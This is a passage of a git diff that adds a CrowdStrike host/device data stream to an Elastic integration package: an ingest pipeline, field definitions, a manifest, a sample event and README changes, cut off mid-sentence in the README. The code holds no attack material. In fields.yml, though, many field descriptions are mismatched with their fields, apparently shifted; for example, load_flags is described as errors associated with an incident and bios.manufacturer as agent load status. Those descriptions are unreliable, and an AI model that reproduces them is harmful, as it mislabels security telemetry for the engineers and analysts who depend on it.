crowdstrike.host.device_policies.sensor_update.settings_hash + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.host.device_policies.sensor_update.settings_hash}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.device_policies?.sensor_update?.settings_hash != null + - rename: + field: json.device_policies.sensor_update.uninstall_protection + tag: rename_device_policies_sensor_update_uninstall_protection + target_field: crowdstrike.host.device_policies.sensor_update.uninstall_protection + ignore_missing: true + - convert: + field: json.external_ip + tag: convert_external_ip_to_ip + target_field: crowdstrike.host.external_ip + type: ip + ignore_missing: true + if: ctx.json?.external_ip != null && ctx.json.external_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_external_ip_into_related_ip + value: '{{{crowdstrike.host.external_ip}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.external_ip != null + - append: + field: host.ip + tag: append_crowdstrike_host_external_ip_into_host_ip + value: '{{{crowdstrike.host.external_ip}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.external_ip != null + - geoip: + field: host.ip + target_field: host.geo + ignore_missing: true + - date: + field: json.first_seen + tag: date_first_seen + target_field: crowdstrike.host.first_seen + formats: + - ISO8601 + if: ctx.json?.first_seen != null && ctx.json.first_seen != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.group_hash + tag: rename_group_hash + target_field: crowdstrike.host.group_hash + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.host.group_hash}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.group_hash != null + - rename: + field: json.groups + tag: rename_groups + target_field: crowdstrike.host.groups + ignore_missing: true + - rename: + field: json.hostname + tag: rename_hostname + target_field: crowdstrike.host.hostname + ignore_missing: true + - set: + field: host.hostname + tag: set_host_hostname_from_host_hostname + copy_from: crowdstrike.host.hostname + ignore_empty_value: true + - append: + field: related.hosts + value: '{{{host.hostname}}}' + allow_duplicates: false + if: ctx.host?.hostname != null + - rename: + field: json.device_id + tag: rename_device_id + target_field: crowdstrike.host.id + ignore_missing: true + - set: + field: device.id + tag: set_device_id_from_host_id + copy_from: crowdstrike.host.id + ignore_empty_value: true + - rename: + field: json.kernel_version + tag: rename_kernel_version + target_field: crowdstrike.host.kernel_version + ignore_missing: true + - date: + field: json.last_seen + tag: date_last_seen + target_field: crowdstrike.host.last_seen + formats: + - ISO8601 + if: ctx.json?.last_seen != null && ctx.json.last_seen != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.local_ip + tag: convert_local_ip_to_ip + target_field: crowdstrike.host.local_ip + type: ip + ignore_missing: true + if: ctx.json?.local_ip != null && ctx.json.local_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_local_ip_into_related_ip + value: '{{{crowdstrike.host.local_ip}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.local_ip != null + - gsub: + field: json.mac_address + tag: gsub_mac_address + pattern: '[:.]' + replacement: '-' + target_field: crowdstrike.host.mac_address + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - uppercase: + field: crowdstrike.host.mac_address + tag: uppercase_mac_address + ignore_missing: true + if: ctx.crowdstrike?.host?.mac_address != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: host.mac + value: '{{{crowdstrike.host.mac_address}}}' + tag: append_device_mac_address_into_host_mac + allow_duplicates: false + if: ctx.crowdstrike?.host?.mac_address != null + - rename: + field: json.machine_domain + tag: rename_machine_domain + target_field: crowdstrike.host.machine_domain + ignore_missing: true + - append: + field: related.hosts + value: '{{{crowdstrike.host.machine_domain}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.machine_domain != null + - rename: + field: json.major_version + tag: rename_major_version + target_field: crowdstrike.host.major_version + ignore_missing: true + - rename: + field: json.meta.version + tag: rename_meta_version + target_field: crowdstrike.host.meta.version + ignore_missing: true + - rename: + field: json.meta.version_string + tag: rename_meta_version_string + target_field: crowdstrike.host.meta.version_string + ignore_missing: true + - rename: + field: json.minor_version + tag: rename_minor_version + target_field: crowdstrike.host.minor_version + ignore_missing: true + - date: + field: json.modified_timestamp + tag: date_modified_timestamp + target_field: crowdstrike.host.modified_timestamp + formats: + - ISO8601 + if: ctx.json?.modified_timestamp != null && ctx.json.modified_timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: '@timestamp' + tag: set_@timestamp_from_host_modified_timestamp + copy_from: crowdstrike.host.modified_timestamp + ignore_empty_value: true + - rename: + field: json.os_build + tag: rename_os_build + target_field: crowdstrike.host.os.build + ignore_missing: true + - rename: + field: json.os_version + tag: rename_os_version + target_field: crowdstrike.host.os.version + ignore_missing: true + - set: + field: host.os.full + tag: set_host_os_full_from_host_os_version + copy_from: crowdstrike.host.os.version + ignore_empty_value: true + - rename: + field: json.platform_id + tag: rename_platform_id + target_field: crowdstrike.host.platform.id + ignore_missing: true + - rename: + field: json.platform_name + tag: rename_platform_name + target_field: crowdstrike.host.platform.name + ignore_missing: true + - set: + field: host.os.platform + tag: set_host_os_platform_from_host_platform_name + copy_from: crowdstrike.host.platform.name + ignore_empty_value: true + - foreach: + field: json.policies + if: ctx.json?.policies instanceof List + ignore_failure: true + processor: + convert: + field: _ingest._value.applied + tag: convert_policies_applied_to_boolean + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.applied + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.policies + if: ctx.json?.policies instanceof List + ignore_failure: true + processor: + date: + field: _ingest._value.applied_date + tag: date_policies_applied_date + target_field: _ingest._value.applied_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.applied_date + ignore_missing: true + - foreach: + field: json.policies + if: ctx.json?.policies instanceof List + ignore_failure: true + processor: + date: + field: _ingest._value.assigned_date + tag: date_policies_assigned_date + target_field: _ingest._value.assigned_date + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.assigned_date + ignore_missing: true + - foreach: + field: json.policies + if: ctx.json?.policies instanceof List + ignore_failure: true + processor: + rename: + field: _ingest._value.policy_id + tag: rename_policies_policy_id + target_field: _ingest._value.policy.id + ignore_missing: true + - foreach: + field: json.policies + if: ctx.json?.policies instanceof List + ignore_failure: true + processor: + rename: + field: _ingest._value.policy_type + tag: rename_policies_policy_type + target_field: _ingest._value.policy.type + ignore_missing: true + - rename: + field: json.policies + tag: rename_policies + target_field: crowdstrike.host.policies + ignore_missing: true + - foreach: + field: crowdstrike.host.policies + if: ctx.crowdstrike?.host.policies instanceof List + ignore_failure: true + processor: + append: + field: related.hash + value: '{{{_ingest._value.settings_hash}}}' + allow_duplicates: false + - rename: + field: json.product_type_desc + tag: rename_product_type_desc + target_field: crowdstrike.host.product_type_desc + ignore_missing: true + - rename: + field: json.provision_status + tag: rename_provision_status + target_field: crowdstrike.host.provision_status + ignore_missing: true + - rename: + field: json.reduced_functionality_mode + tag: rename_reduced_functionality_mode + target_field: crowdstrike.host.reduced_functionality_mode + ignore_missing: true + - rename: + field: json.serial_number + tag: rename_serial_number + target_field: crowdstrike.host.serial_number + ignore_missing: true + - rename: + field: json.site_name + tag: rename_site_name + target_field: crowdstrike.host.site_name + ignore_missing: true + - rename: + field: json.status + tag: rename_status + target_field: crowdstrike.host.status + ignore_missing: true + - rename: + field: json.system_manufacturer + tag: rename_system_manufacturer + target_field: crowdstrike.host.system.manufacturer + ignore_missing: true + - rename: + field: json.system_product_name + tag: rename_system_product_name + target_field: crowdstrike.host.system.product_name + ignore_missing: true + - rename: + field: json.tags + tag: rename_tags + target_field: crowdstrike.host.tags + ignore_missing: true + - remove: + field: + - crowdstrike.host.external_ip + - crowdstrike.host.hostname + - crowdstrike.host.id + - crowdstrike.host.mac_address + - crowdstrike.host.modified_timestamp + - crowdstrike.host.os.version + - crowdstrike.host.platform.name + tag: remove_custom_duplicate_fields + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) + - remove: + field: json + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + description: Drops null/empty values recursively. + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/crowdstrike/data_stream/host/fields/base-fields.yml b/packages/crowdstrike/data_stream/host/fields/base-fields.yml new file mode 100644 index 00000000000..44670987f11 --- /dev/null +++ b/packages/crowdstrike/data_stream/host/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module. + value: crowdstrike +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: crowdstrike.host +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/crowdstrike/data_stream/host/fields/beats.yml b/packages/crowdstrike/data_stream/host/fields/beats.yml new file mode 100644 index 00000000000..b3701b581cf --- /dev/null +++ b/packages/crowdstrike/data_stream/host/fields/beats.yml @@ -0,0 +1,9 @@ +- name: input.type + type: keyword + description: Type of filebeat input. +- name: log.offset + type: long + description: Log offset. +- name: tags + type: keyword + description: User defined tags. diff --git a/packages/crowdstrike/data_stream/host/fields/fields.yml b/packages/crowdstrike/data_stream/host/fields/fields.yml new file mode 100644 index 00000000000..d36aeaec2c6 --- /dev/null +++ b/packages/crowdstrike/data_stream/host/fields/fields.yml @@ -0,0 +1,285 @@ +- name: crowdstrike.host + type: group + fields: + - name: agent + type: group + fields: + - name: load_flags + type: keyword + description: Any errors associated with the incident. + - name: local_time + type: date + description: The fine score associated with the incident. + - name: version + type: keyword + description: The list of host IDs associated with the incident. + - name: bios + type: group + fields: + - name: manufacturer + type: keyword + description: Flags indicating the load status of the agent on the host. + - name: version + type: keyword + description: The local time on the host where the agent is running. + - name: chassis_type + type: group + fields: + - name: desc + type: keyword + description: The version of the agent running on the host. + - name: value + type: keyword + description: The manufacturer of the BIOS on the host. + - name: cid + type: keyword + description: The version of the BIOS on the host. + - name: config_id + type: group + fields: + - name: base + type: keyword + description: The customer ID associated with the host. + - name: build + type: keyword + description: The base configuration ID associated with the host. + - name: platform + type: keyword + description: The build configuration ID associated with the host. + - name: connection_ip + type: ip + description: The platform configuration ID associated with the host. + - name: cpu_signature + type: keyword + description: The device ID associated with the host. + - name: device_policies + type: group + fields: + - name: device_control + type: group + fields: + - name: applied + type: boolean + description: Timestamp indicating when the host was first seen. + - name: applied_date + type: date + description: The groups associated with the host. + - name: assigned_date + type: date + description: Timestamp indicating when the host was last seen. + - name: policy_id + type: keyword + description: The local IP address of the host. + - name: policy_type + type: keyword + description: The domain to which the machine belongs. + - name: firewall + type: group + fields: + - name: applied + type: boolean + description: The major version of the operating system on the host. + - name: applied_date + type: date + description: The minor version of the operating system on the host. + - name: assigned_date + type: date + description: Timestamp indicating when the host information was last modified. + - name: policy + type: group + fields: + - name: id + type: keyword + description: The organizational units associated with the host. + - name: type + type: keyword + description: The platform ID of the host. + - name: rule_set_id + type: keyword + description: The platform name of the host. + - name: global_config + type: group + fields: + - name: applied + type: boolean + description: The description of the product type of the host. + - name: applied_date + type: date + description: The product type of the host. + - name: assigned_date + type: date + description: The site name associated with the host. + - name: policy + type: group + fields: + - name: id + type: keyword + description: The status of the host. + - name: type + type: keyword + description: The manufacturer of the system on the host. + - name: settings_hash + type: keyword + description: The product name of the system on the host. + - name: prevention + type: group + fields: + - name: applied + type: boolean + description: The objectives associated with the incident. + - name: applied_date + type: date + description: The state of the incident, whether open or closed. + - name: assigned_date + type: date + description: The status of the incident. + - name: policy + type: group + fields: + - name: id + type: keyword + description: The tactics associated with the incident. + - name: type + type: keyword + description: The techniques associated with the incident. + - name: rule_groups + type: keyword + description: The type of incident. + - name: settings_hash + type: keyword + description: The users associated with the incident. + - name: remote_response + type: group + fields: + - name: applied + type: boolean + - name: applied_date + type: date + - name: assigned_date + type: date + - name: policy + type: group + fields: + - name: id + type: keyword + - name: type + type: keyword + - name: settings_hash + type: keyword + - name: sensor_update + type: group + fields: + - name: applied + type: boolean + - name: applied_date + type: date + - name: assigned_date + type: date + - name: policy + type: group + fields: + - name: id + type: keyword + - name: type + type: keyword + - name: settings_hash + type: keyword + - name: uninstall_protection + type: keyword + - name: external_ip + type: ip + description: The external IP address of the host. + - name: first_seen + type: date + - name: group_hash + type: keyword + - name: groups + type: keyword + - name: hostname + type: keyword + description: The hostname of the host. + - name: id + type: keyword + description: Timestamp indicating when the incident started. + - name: kernel_version + type: keyword + - name: last_seen + type: date + - name: local_ip + type: ip + - name: mac_address + type: keyword + description: The MAC address of the host. + - name: machine_domain + type: keyword + - name: major_version + type: keyword + - name: meta + type: group + fields: + - name: version + type: keyword + - name: version_string + type: keyword + - name: minor_version + type: keyword + - name: modified_timestamp + type: date + description: Timestamp indicating when the incident was created. + - name: os + type: group + fields: + - name: build + type: keyword + - name: version + type: keyword + description: The version of the operating system on the host. + - name: platform + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + description: The identifier associated with the customer. + - name: policies + type: group + fields: + - name: applied + type: boolean + - name: applied_date + type: date + - name: assigned_date + type: date + - name: policy + type: group + fields: + - name: id + type: keyword + - name: type + type: keyword + - name: rule_groups + type: keyword + - name: settings_hash + type: keyword + - name: product_type_desc + type: keyword + - name: provision_status + type: keyword + - name: reduced_functionality_mode + type: keyword + - name: serial_number + type: keyword + - name: site_name + type: keyword + - name: status + type: keyword + - name: system + type: group + fields: + - name: manufacturer + type: keyword + - name: product_name + type: keyword + - name: tags + type: keyword diff --git a/packages/crowdstrike/data_stream/host/manifest.yml b/packages/crowdstrike/data_stream/host/manifest.yml new file mode 100644 index 00000000000..27ee3ddf544 --- /dev/null +++ b/packages/crowdstrike/data_stream/host/manifest.yml @@ -0,0 +1,81 @@ +title: Collect Host logs from CrowdStrike. +type: logs +streams: + - input: cel + title: Hosts + description: Collect Hosts/Devices from CrowdStrike Falcon Intelligence. + enabled: false + template_path: cel.yml.hbs + vars: + - name: initial_interval + type: text + title: Initial Interval + description: How far back to pull the Host logs from CrowdStrike. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 24h + - name: interval + type: text + title: Interval + description: Duration between requests to the CrowdStrike API. Supported units for this parameter are h/m/s. + default: 5m + multi: false + required: true + show_user: true + - name: batch_size + type: integer + title: Batch Size + description: Batch size for the response of the CrowdStrike API. It must be between 1 - 5000. + default: 5000 + multi: false + required: true + show_user: false + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: true + show_user: false + default: 30s + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_resource_tracer_filename) for details. + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - crowdstrike-host + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve crowdstrike.host fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. diff --git a/packages/crowdstrike/data_stream/host/sample_event.json b/packages/crowdstrike/data_stream/host/sample_event.json new file mode 100644 index 00000000000..45a14423a50 --- /dev/null +++ b/packages/crowdstrike/data_stream/host/sample_event.json @@ -0,0 +1,228 @@ +{ + "@timestamp": "2023-11-07T10:26:53.000Z", + "agent": { + "ephemeral_id": "5805cb9f-4413-4da3-8da7-b85cd99c2961", + "id": "b095b147-68c9-47a8-a1fc-7fd9dc3764c5", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.11.0" + }, + "crowdstrike": { + "host": { + "agent": { + "load_flags": "0", + "local_time": "2023-11-07T04:51:16.678Z", + "version": "7.05.17603.0" + }, + "bios": { + "manufacturer": "ABCInc.", + "version": "2020.0.1.0.0(iBridge:22.11.000.0.0,0)" + }, + "chassis_type": { + "desc": "Laptop", + "value": "9" + }, + "cid": "92012896127c4948236ba7601b886b0", + "config_id": { + "base": "6594763", + "build": "1703", + "platform": "4" + }, + "connection_ip": "81.2.69.192", + "cpu_signature": "460517", + "device_policies": { + "device_control": { + "applied": true, + "applied_date": "2023-06-20T08:45:26.341Z", + "assigned_date": "2023-06-20T08:43:47.736Z", + "policy_id": "2f88daf0177f467dae69262a5ce71775", + "policy_type": "device-control" + }, + "firewall": { + "applied": true, + "applied_date": "2023-09-11T10:33:44.174Z", + "assigned_date": "2023-09-11T10:32:47.853Z", + "policy": { + "id": "1ee301f7e3e24e96ad6a23c73aaac1e3", + "type": "firewall" + }, + "rule_set_id": "1ee301f7e3e24e96ad6a23c73aaac1e3" + }, + "global_config": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.515Z", + "assigned_date": "2023-11-07T04:51:18.946Z", + "policy": { + "id": "7e3078b60976486cac5dc998808d9135", + "type": "globalconfig" + }, + "settings_hash": "f01def74" + }, + "prevention": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + }, + "remote_response": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.017Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "dabb4def99034f11b9b3d52271584c9f", + "type": "remote-response" + }, + "settings_hash": "8a548e5e" + }, + "sensor_update": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.659Z", + "assigned_date": "2023-11-07T04:47:43.342Z", + "policy": { + "id": "64bfa2bbcd4e46da92a66b107933da11", + "type": "sensor-update" + }, + "settings_hash": "tagged|18;101", + "uninstall_protection": "ENABLED" + } + }, + "external_ip": "81.2.69.192", + "first_seen": "2023-06-08T10:00:19.000Z", + "group_hash": "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77", + "groups": [ + "182388a8dbea4c44b5e019cfd32c2695" + ], + "hostname": "CLM101-131.local", + "id": "3114433dbce478ca48d9a828b9b34be", + "kernel_version": "22.6.0", + "last_seen": "2023-11-07T10:25:24.000Z", + "local_ip": "81.2.69.142", + "mac_address": "14-7D-DA-AD-AC-71", + "machine_domain": "SYS", + "major_version": "22", + "meta": { + "version": "6002", + "version_string": "7:43570272778" + }, + "minor_version": "6", + "modified_timestamp": "2023-11-07T10:26:53.000Z", + "os": { + "build": "22G120", + "version": "Ventura(13)" + }, + "platform": { + "id": "1", + "name": "Mac" + }, + "policies": [ + { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + } + ], + "product_type_desc": "Workstation", + "provision_status": "Provisioned", + "reduced_functionality_mode": "no", + "serial_number": "FVFDH73HMNHX", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system": { + "manufacturer": "ABCInc.", + "product_name": "Air,1" + }, + "tags": [ + "tags" + ] + } + }, + "data_stream": { + "dataset": "crowdstrike.host", + "namespace": "ep", + "type": "logs" + }, + "device": { + "id": "3114433dbce478ca48d9a828b9b34be" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "b095b147-68c9-47a8-a1fc-7fd9dc3764c5", + "snapshot": false, + "version": "8.11.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "host" + ], + "dataset": "crowdstrike.host", + "ingested": "2024-01-22T13:24:41Z", + "kind": "event", + "original": "{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-11-07T04:51:16.678Z\",\"agent_version\":\"7.05.17603.0\",\"bios_manufacturer\":\"ABCInc.\",\"bios_version\":\"2020.0.1.0.0(iBridge:22.11.000.0.0,0)\",\"chassis_type\":\"9\",\"chassis_type_desc\":\"Laptop\",\"cid\":\"92012896127c4948236ba7601b886b0\",\"config_id_base\":\"6594763\",\"config_id_build\":\"1703\",\"config_id_platform\":\"4\",\"connection_ip\":\"81.2.69.192\",\"cpu_signature\":\"460517\",\"device_id\":\"3114433dbce478ca48d9a828b9b34be\",\"device_policies\":{\"device_control\":{\"applied\":true,\"applied_date\":\"2023-06-20T08:45:26.341093915Z\",\"assigned_date\":\"2023-06-20T08:43:47.736146738Z\",\"policy_id\":\"2f88daf0177f467dae69262a5ce71775\",\"policy_type\":\"device-control\"},\"firewall\":{\"applied\":true,\"applied_date\":\"2023-09-11T10:33:44.174488832Z\",\"assigned_date\":\"2023-09-11T10:32:47.853976945Z\",\"policy_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\",\"policy_type\":\"firewall\",\"rule_set_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\"},\"global_config\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.515775409Z\",\"assigned_date\":\"2023-11-07T04:51:18.94671252Z\",\"policy_id\":\"7e3078b60976486cac5dc998808d9135\",\"policy_type\":\"globalconfig\",\"settings_hash\":\"f01def74\"},\"prevention\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"},\"remote_response\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.01735027Z\",\"assigned_date\":\"2023-06-08T10:03:49.505163572Z\",\"policy_id\":\"dabb4def99034f11b9b3d52271584c9f\",\"policy_type\":\"remote-response\",\"settings_hash\":\"8a548e5e\"},\"sensor_update\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.659583066Z\",\"assigned_date\":\"2023-11-07T04:47:43.342175341Z\",\"policy_id\":\"64bfa2bbcd4e46da92a66b107933da11\",\"policy_type\":\"sensor-update\",\"settings_hash\":\"tagged|18;101\",\"uninstall_protection\":\"ENABLED\"}},\"external_ip\":\"81.2.69.192\",\"first_seen\":\"2023-06-08T10:00:19Z\",\"group_hash\":\"b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77\",\"groups\":[\"182388a8dbea4c44b5e019cfd32c2695\"],\"hostname\":\"CLM101-131.local\",\"kernel_version\":\"22.6.0\",\"last_seen\":\"2023-11-07T10:25:24Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"14-7d-da-ad-ac-71\",\"machine_domain\":\"SYS\",\"major_version\":\"22\",\"meta\":{\"version\":\"6002\",\"version_string\":\"7:43570272778\"},\"minor_version\":\"6\",\"modified_timestamp\":\"2023-11-07T10:26:53Z\",\"os_build\":\"22G120\",\"os_version\":\"Ventura(13)\",\"platform_id\":\"1\",\"platform_name\":\"Mac\",\"policies\":[{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"}],\"product_type_desc\":\"Workstation\",\"provision_status\":\"Provisioned\",\"reduced_functionality_mode\":\"no\",\"serial_number\":\"FVFDH73HMNHX\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"ABCInc.\",\"system_product_name\":\"Air,1\",\"tags\":[\"tags\"]}", + "type": [ + "info" + ] + }, + "host": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "hostname": "CLM101-131.local", + "ip": [ + "81.2.69.192" + ], + "mac": [ + "14-7D-DA-AD-AC-71" + ], + "os": { + "full": "Ventura(13)", + "platform": "Mac" + } + }, + "input": { + "type": "cel" + }, + "related": { + "hash": [ + "f01def74", + "f7a54ca1", + "8a548e5e", + "tagged|18;101", + "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77" + ], + "hosts": [ + "CLM101-131.local", + "SYS" + ], + "ip": [ + "81.2.69.192", + "81.2.69.142" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "crowdstrike-host" + ] +} \ No newline at end of file diff --git a/packages/crowdstrike/docs/README.md b/packages/crowdstrike/docs/README.md index 3c24eb55630..3235ec320b3 100644 --- a/packages/crowdstrike/docs/README.md +++ b/packages/crowdstrike/docs/README.md @@ -1,17 +1,557 @@ # CrowdStrike Integration -This integration is for [CrowdStrike](https://www.crowdstrike.com/resources/?cs_query=type=5) products. It includes the -following datasets for receiving logs: +The [CrowdStrike](https://www.crowdstrike.com/) Falcon integration allows you to easily connect your CrowdStrike Falcon platform to Elastic for seamless onboarding of alerts and telemetry from CrowdStrike Falcon and Falcon Data Replicator. Elastic Security can leverage this data for security analytics including correlation, visualization and incident response. It provides support using three different modes for integrating CrowdStrike to the Elastic: + +1. Falcon SIEM Connector: This is a pre-built integration designed to connect CrowdStrike Falcon with Security Information and Event Management (SIEM) systems. It streamlines the flow of security data from CrowdStrike Falcon to the SIEM, providing a standardized and structured way of feeding information into the SIEM platform. It includes the following datasets for receiving logs: - `falcon` dataset: consists of endpoint data and Falcon platform audit data forwarded from [Falcon SIEM Connector](https://www.crowdstrike.com/blog/tech-center/integrate-with-your-siem/). + +2. CrowdStrike REST API: This provides a programmatic interface to interact with the CrowdStrike Falcon platform. It allows users to perform various operations such as querying information about unified alerts and hosts/devices. It includes the following datasets for receiving logs: + +- `alert` dataset: It is typically used to retrieve detailed information about unified alerts generated by the CrowdStrike Falcon platform, via Falcon Intelligence Alert API - `/alerts/entities/alerts/v2`. + +- `host` dataset: It retrieves all the hosts/devices in your environment providing information such as device metadata, configuration, and status generated by the CrowdStrike Falcon platform, via Falcon Intelligence Host/Device API - `/devices/entities/devices/v2`. It is more focused to provide the management and monitoring information of devices such as login details, status, policies, configuration etc. + +3. Falcon Data Replicator: This Collect events in near real time from your endpoints and cloud workloads, identities and data. CrowdStrike Falcon Data Replicator (FDR) enables you with actionable insights to improve SOC performance. FDR contains near real-time data collected by the Falcon platform's single, lightweight agent. It includes the following datasets for receiving logs: + - `fdr` dataset: consists of logs forwarded using the [Falcon Data Replicator](https://github.com/CrowdStrike/FDR). ## Compatibility -This integration supports CrowdStrike Falcon SIEM-Connector-v2.0. +This integration is compatible with both CrowdStrike Falcon SIEM-Connector-v2.0 and REST API. +For Rest API support, this module has been tested against the **CrowdStrike API Version v1/v2**. + +The minimum **kibana.version** required is **8.12.0**. + +## Setup +### To collect data from CrowdStrike REST API, the following parameters from your CrowdStrike instance are required: + +1. Client ID +2. Client Secret +3. Token url +4. API Endpoint url +5. Required scopes for each data stream : + + | Data Stream | Scope | + | ------------- | ------------- | + | Alert | read:alert | + | Host | read:host | ## Logs +### Alert + +This is the 